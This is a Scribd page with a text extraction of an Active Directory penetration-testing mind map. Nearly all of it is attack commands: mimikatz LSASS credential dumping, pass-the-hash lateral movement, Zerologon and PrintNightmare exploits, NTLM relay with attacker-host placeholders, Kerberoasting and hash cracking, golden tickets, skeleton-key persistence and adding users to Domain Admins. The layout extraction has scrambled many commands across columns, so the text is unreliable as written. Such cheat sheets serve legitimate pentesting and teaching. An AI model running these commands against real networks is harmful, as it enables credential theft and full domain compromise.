Scribd
Upload
260 views1 page

Pentesting Active Directory

The document discusses different techniques for pivoting to other computers without credentials such as psexec.py, wmiexec.py, and texec.py. It also covers dumping LSASS memory to extract credentials and using those credentials for privilege escalation on remote systems over SMB.

Uploaded by

xhacksn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
260 views1 page

Pentesting Active Directory

The document discusses different techniques for pivoting to other computers without credentials such as psexec.py, wmiexec.py, and texec.py. It also covers dumping LSASS memory to extract credentials and using those credentials for privilege escalation on remote systems over SMB.

Uploaded by

xhacksn
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 1

‎Pivoting to others computers

‎psexec.py -hashes ":<hash>" <user>@<ip>

‎wmiexec.py -hashes ":<hash>" <user>@<ip>

‎ texec.py -hashes ":<hash>" <user>@<ip> "


a
‎command"
‎got administrator access on one machine ‎pass the hash
‎ vil-winrm -i <ip>/<domain> -u <user> -H <
e
‎no credentials
‎ imikatz "privilege::debug" "sekurlsa::
m ‎hash>
‎ rocdump.exe -accepteula -ma lsass.exe lsass.
p ‎minidump lsass.dmp" "sekurlsa::
‎cme smb <ip_range> # enumerate smb hosts ‎Privilege escalation
‎dmp ‎logonPasswords" "exit" ‎ freerdp /u:<user> /d:<domain> /pth:<hash> /
x
‎classic quick compromission methods
‎v:<ip>
‎nmap -sP -p <ip> # ping scan ‎winpeas.exe
‎ imikatz "privilege::debug" "token::elevate" "
m
‎java rmi ‎exploit/multi/misc/java_rmi_server
‎sekurlsa::logonpasswords" "lsadump::sam" " ‎ ython getTGT.py <domain>/<user> -hashes :<
p ‎ xport KRB5CCNAME=/root/impacket-
e ‎ ython psexec.py <domain>/<user>@<ip> -k -
p
‎ map -PN -sV --top-ports 50 --open <ip> #
n ‎search password files ‎findstr /si 'password' *.txt *.xml *.docx
‎exit" ‎hashes> ‎examples/domain_ticket.ccache ‎no-pass
‎quick scan ‎ms17-010 ‎exploit/windows/smb/ms17_010_eternalblue
‎Juicy Potato / Lovely Potato ‎overpass the hash / pass the key (PTK)
‎post/windows/gather/smart_hashdump ‎hashdump ‎Rubeus ptt /ticket:<ticket>
‎ map -PN --script smb-vuln* -p139,445 <ip> #
n ‎ uxiliary/scanner/http/tomcat_enum
a ‎get credentials
‎search smb vuln ‎tomcat/jboss manager ‎exploit/multi/http/tomcat_mgr_deploy ‎PrintSpoofer ‎Rubeus asktgt /user:victim /rc4:<rc4value>
‎Scan Network ‎find vulnerable host
‎ me smb <ip_range> -u <user> -p <password> -
c ‎ ubeus createnetonly /program:C:\Windows\
R
‎M lsassy ‎System32\[cmd.exe||upnpcont.exe] ‎Rubeus ptt /luid:0xdeadbeef /ticket:<ticket>
‎nmap -PN -sC -sV <ip> # classic scan ‎java serialized port ‎ysoserial ‎RoguePotato
‎Low access
‎ me smb <ip_range> -u <user> -p '<
c ‎ rivilege::debug sekurlsa::tickets /export
p
‎nmap -PN -sC -sV -p- <ip> # full scan ‎vulnerable product with cve ‎searchsploit ‎SMBGhost CVE-2020-0796
‎Low hanging fruit ‎password>' --sam / --lsa / --ntds ‎sekurlsa::tickets /export

‎nmap -sU -sC -sV <ip> # udp scan ‎use scanner/smb/smb_enum_gpp ‎ VE-2021-36934 (HiveNightmare/
C ‎PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp ‎Get tickets ‎Rubeus dump /service:krbtgt /nowrap
‎SeriousSAM)
‎MS14-025
f‎ indstr /S /I cpassword \\<FQDN>\sysvol\<
‎ imikatz "!+" "!processprotect /process:lsass.
m ‎Rubeus dump /luid:0xdeadbeef /nowrap
‎FQDN>\policies\*.xml ‎... ‎LSA as a Protected Process
‎ mcli dev show eth0 # show domain name &
n ‎exe /remove" "privilege::debug" "token::
‎dns ‎elevate" "sekurlsa::logonpasswords" "!
‎database credentials ‎use admin/mssql/mssql_enum_sql_logins ‎Get-NetComputer -Unconstrained
‎processprotect /process:lsass.exe" "!-" #with ‎Unconstrained delegation
‎ slookup -type=SRV _ldap._tcp.dc._msdcs.//
n ‎mimidriver.sys
‎find AD IP ‎proxylogon ‎ et-DomainComputer -Unconstrained -
G
‎DOMAIN/
‎Properties DnsHostName
‎search password files ‎findstr /si 'password' *.txt *.xml *.docx
‎ roxyshell
p ‎Administrator access
‎ ot username but no password
g ‎Get unconstrained delegation machines ‎ ATCH (c:Computer {unconstraineddelegation:
M
‎search stored password ‎lazagne.exe all
‎dig axfr <domain_name> @<name_server> ‎true}) RETURN c
‎zone transfert ‎ rackmapexec <IP> -u 'user' -p 'password' --
c
‎ klink /d c:\shadowcopy \\?\GLOBALROOT\
m
‎pass-pol
‎shadow copies ‎diskshadow list shadows all ‎Device\HarddiskVolumeShadowCopy1\ ‎ ATCH (u:User {owned:true}), (c:Computer {
M
‎Get password policy ‎unconstraineddelegation:true}), p=
‎enum4linx -u 'username' -p 'password' -P <IP> ‎shortestPath((u)-[*1..]->(c)) RETURN p
.‎\incognito.exe execute -c "<domain>\<user>"
‎ num4linux -a -u "" -p "" <dc-
e ‎ me smb <dc-ip> -u user.txt -p password.txt --
c
‎.\incognito.exe list_tokens -u ‎powershell.exe
‎ rivilege::debug sekurlsa::tickets /export
p
‎Password spray ‎token manipulation
‎ip> && enum4linux -a -u " ‎no-bruteforce # test user=password
‎ se incognito
u ‎impersonate_token <domain>\\<user>
‎sekurlsa::tickets /export
‎credentials found
‎guest" -p "" <dc-ip> ‎ me smb <dc-ip> -u user.txt -p password.txt #
c
‎got an admin access ?
‎Get tickets ‎Rubeus dump /service:krbtgt /nowrap
‎multiple test (carrefull of lock policy) ‎dpapi extract

‎Rubeus dump /luid:0xdeadbeef /nowrap


‎ ython GetNPUsers.py <domain>/ -usersfile <
p
s‎ mbmap -u "" -p "" -P 445 -H <dc-ip> &&
‎Got valid username ‎usernames.txt> -format hashcat -outputfile < ‎got credentials
‎smbmap -u "guest" -p "" -P 445 -H <dc-ip> ‎ et-DomainComputer -TrustedToAuth -
G
‎hashes.domain.txt> ‎hash found ‎Constrained delegation ‎Properties DnsHostName, MSDS-
‎Get hash ‎ etADUsers.py -all -dc-ip <dc_ip> <domain>/<
G ‎AllowedToDelegateTo
s‎ mbclient -U '%' -L //<dc-ip> && smbclient -U '
‎Rubeus asreproast /format:hashcat ‎Get all users ‎username>
‎guest%' -L //<dc-ip>
‎ ist guest access on smb
L ‎ASREPRoast ‎ et-DomainUser -PreauthNotRequired -
G
‎ ATCH (c:Computer), (t:Computer), p=((c)-[:
M
‎cme smb <ip> -u '' -p '' # enumerate null session ‎ me smb <ip> -u <user> -p <password> --
c ‎AllowedToDelegate]->(t)) RETURN p
‎share ‎Properties SamAccountName ‎enumerate SMB share ‎shares ‎Get constrained delegation machines

‎ me smb <ip> -u 'a' -p '' # enumerate


c ‎ ATCH (u:User {owned:true}), (c:Computer {
M
‎Get ASREPRoastable users ‎ ATCH (u:User {dontreqpreauth:true}), (c:
M ‎ loodhound-python -d <domain> -u <user> -
b ‎name: "<MYTARGET.FQDN>"}), p=shortestPath((
‎anonymous access
‎Computer), p=shortestPath((u)-[*1..]->(c)) ‎bloodhound ‎p <password> -gc <dc> -c all ‎u)-[*1..]->(c)) RETURN p
‎Pentesting active ‎RETURN p
‎powerview / pywerview ‎Resource-Based Constrained Delegation
‎directory ‎ map -n -sV --script "ldap* and not brute" -p
n
‎389 <dc-ip>
‎Lateral move
‎user found ‎ etUserSPNs.py -request -dc-ip <dc_ip> <
G l‎sadump::dcsync /domain:htb.local /user:
‎domain>/<user>:<password> ‎krbtgt # Administrators, Domain Admins, or
‎Enumerate ldap ‎ldapsearch -x -h <ip> -s base ‎Get hash
‎hash found
‎Enterprise Admins as well as Domain Controller
‎Rubeus kerberoast ‎dcsync ‎computer accounts

‎ et-DomainUser -SPN -Properties


G ‎ SUSpendu.ps1 # need compromised WSUS
W
‎enum4linux -U <dc-ip> | grep 'user:' ‎kerberoasting
‎SamAccountName, ServicePrincipalName ‎WSUSpect ‎server

‎ rackmapexec smb <ip> -u <user> -p '<


c
‎MATCH (u:User {hasspn:true}) RETURN u ‎sccm ‎CMPivot
‎password>' --users
‎user found ‎Get kerberoastable users
‎Find user list
‎Got one account on the domain ‎ ATCH (u:User {hasspn:true}), (c:Computer), p=
M ‎MSSQL Trusted Links ‎use exploit/windows/mssql/mssql_linkcrawler
‎ map -p 88 --script=krb5-enum-users --script-
n
‎args="krb5-enum-users.realm='<domain>', ‎shortestPath((u)-[*1..]->(c)) RETURN p
‎OSINT - enumerate username on internet ‎userdb=<users_list_file>" <ip> r‎ pcdump.py <domain>/<user>:<password>@< ‎ rinterbug.py '<domain>/<username>:<
p
r‎ pcclient $> lookupnames <name> ‎Printers spooler service abuse ‎domain_server> | grep MS-RPRN ‎password>'@<Printer IP> <RESPONDERIP>
‎wmic useraccount get name,sid
‎auxiliary/admin/kerberos/ms14_068_kerberos_ ‎GenericAll on User
‎ map -Pn -sS -T4 --open --script smb-security-
n ‎checksum
‎mode -p445 ADDRESS/MASK ‎cracking hash ‎GenericAll on Group
‎MS14-068 ‎FindSMB2UPTime.py <ip>
‎ oldenPac.py -dc-ip <dc_ip> <domain>/<
g
‎unsigned SMB
‎find smb not signed ‎use exploit/windows/smb/smb_relay ‎john --format=lm hash.txt ‎user>:'<password>'@<target> ‎kerberos::ptc "<ticket>" ‎GenericAll / GenericWrite / Write on Computer
‎LM
‎cme smb $hosts --gen-relay-list relay.txt ‎hashcat -m 3000 -a 3 hash.txt ‎ nscmd.exe /config /serverlevelplugindll <\\
d s‎ c \\DNSServer stop dns ‎WriteProperty on Group
‎path\to\dll> # need a dnsadmin user ‎sc \\DNSServer start dns
‎ etitPotam.py -d <domain> <listener_ip> <
P ‎john --format=nt hash.txt ‎Self (Self-Membership) on Group
‎target_ip> ‎NTLM ‎ VE-2021-1675.py <domain>/<user>:<
C ‎AD acl abuse ‎aclpwn.py
‎relay/poisoning ‎hashcat -m 1000 -a 3 hash.txt
‎password>@<target> '\\<smb_server_ip>\<
‎PrintNightmare ‎share>\inject.dll' ‎WriteProperty (Self-Membership)
‎responder -i eth0
‎user & hash found
‎john --format=netntlm hash.txt ‎ForceChangePassword
‎mitm6 -d <domain> ‎ nstool.py -u 'DOMAIN\user' -p 'password' --
d
‎NTLMv1 ‎enum dns ‎record '*' --action query <dc_ip>
‎hashcat -m 5500 -a 3 hash.txt ‎WriteOwner on Group
‎crack hash
‎ ython3 cve-2020-1472-exploit.py <MACHINE_
p ‎find hash ‎john --format=netntlmv2 hash.txt ‎GenericWrite on User
‎BIOS_NAME> <ip> ‎NTLMv2
‎secretsdump.py <DOMAIN>/<MACHINE_BIOS_
‎hashcat -m 5600 -a 0 hash.txt rockyou.txt ‎WriteDACL + WriteOwner
‎NAME>\$@<IP> -no-pass -just-dc-user "
‎Administrator" ‎ ython3 restorepassword.py -target-ip <IP> <
p
‎secretsdump.py -hashes :<HASH_admin> < ‎DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_ j‎ohn spn.txt --format=krb5tgs --wordlist= ‎GPO Delegation
‎DOMAIN>/Administrator@<IP> ‎BIOS_NAME> -hexpass <HEXPASS> ‎rockyou.txt
‎Domain admin
‎zerologon ‎Kerberos 5 TGS ‎ et-LAPSPasswords -DomainController <ip_
G
‎hashcat -m 13100 -a 0 spn.txt rockyou.txt ‎dc> -Credential <domain>\<login> | Format-
‎ rackmapexec smb 127.0.0.1 -u <user> -p <
c
‎Table -AutoSize
‎ indly provided by Orange Cyberdefense ;-)
K ‎password> -d <domain> --ntds
‎ ashcat -m 18200 -a 0 AS-REP_roast-hashes
h
‎Some commands can break stuff, be sure to know what are you doing ! ‎no smb signing || ipv6 enabled || adcs
‎Kerberos ASREP ‎rockyou.txt f‎ oreach ($objResult in $colResults){$
‎Please find legend below. s‎ ecretsdump.py '<domain>/<user>:<pass>'@<
‎get laps passwords ‎objComputer = $objResult.Properties; $
‎ip>
‎ se exploit/windows/smb/smb_relay #
u ‎dump ntds.dit ‎objComputer.name|where {$objcomputer.
‎Bloodhound ‎MS08-068 ‎windows200 / windows server2008 ‎Domain admin ‎name -ne $env:computername}|%{foreach-
s‎ ecretsdump.py -ntds ntds_file.dit -system ‎object {Get-AdmPwdPassword -
‎SYSTEM_FILE -hashes lmhash:nthash LOCAL - ‎ComputerName $_}}}
‎responder -I eth0 # disable smb & http ‎ntlmrelayx.py -tf targets.txt
‎PowerView ‎ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ‎outputfile ntlm-extract

‎ tlmrelayx.py -6 -wh <attacker_ip> -l /tmp -


n ‎ ython privexchange.py -ah <attacker_host_or_
p
‎windows/gather/credentials/domain_hashdump ‎ip> <exchange_host> -u <user> -d <domain> - ‎ tlmrelayx.py -t ldap://<dc_fqdn>--escalate-
n
‎socks -debug
‎privexchange ‎p <password> ‎user <user>

‎ tlmrelayx.py -6 -wh <attacker_ip> -t smb://<


n
‎mitm6 -i eth0 -d <domain> ‎target> -l /tmp -socks -debug ‎ADCS
‎relay ‎Persistance
‎ tlmrelayx.py -t ldaps://<dc_ip> -wh <attacker_
n ‎ etST.py -spn cifs/<target> <domain>/<
g ‎mayfly (@M4yFly)
‎ip> --delegate-access ‎netbios_name>\$ -impersonate <user> ‎ et group "domain admins" myuser /add /
n
‎domain ‎Trust relationship
‎ tlmrelayx.py -t http://<dc_ip>/certsrv/
n
‎certfnsh.asp -debug -smb2support --adcs -- ‎ ubeus.exe asktgt /user:<user> /certificate:<
R t‎ icketer.py -nthash <nthash> -domain-sid < ‎ erberos::golden /user:Administrator /krbtgt:<
k
‎adcs ‎template DomainController ‎base64-certificate> /ptt ‎Golden ticket ‎domain_sid> -domain <domain> <user> ‎ et-NetGroup -Domain <domain> -
G ‎HASH_KRBTGT> /domain:<domain> /sid:<user_
‎ hild Domain to Forest Compromise - SID
C ‎GroupName "Enterprise Admins" -FullData| ‎sid> /sids:<RootDomainSID-519> /ptt
‎Silver Ticket ‎Hijacking ‎select objectsid ‎mimikatz lsadump::trust ‎

‎ owerShell New-ItemProperty “HKLM:\System\


P "‎ kerberos::golden /user:Administrator /
‎CurrentControlSet\Control\Lsa\” -Name ‎domain:<domain> /sid:
‎“DsrmAdminLogonBehavior” -Value 2 - ‎<domain_SID> /rc4:<trust_key> /service:krbtgt / .‎\Rubeus.exe asktgs /ticket:<kirbi file> /
‎DSRM ‎PropertyType DWORD "‎ lsadump::trust /patch" ‎target:<target_domain> /ticket: ‎service:"Service's SPN" /ptt
‎Persistance ‎Forest to Forest Compromise - Trust Ticket ‎"lsadump::lsa /patch" ‎<golden_ticket_path>" ‎
‎ imikatz "privilege::debug" "misc::skeleton" "
m ‎Trust relationship
‎Skeleton Key ‎exit" ‎ rinterbug or petitpotam to force the DC of the
p
‎external forest to connect on a local
‎ imikatz "privilege::debug" "misc::memssp" "
m ‎unconstrained delegation machine. Capture
‎Custom SSP ‎exit" ‎C:\Windows\System32\kiwissp.log ‎Breaking forest trust ‎TGT, inject into memory and dcsync

‎...

You might also like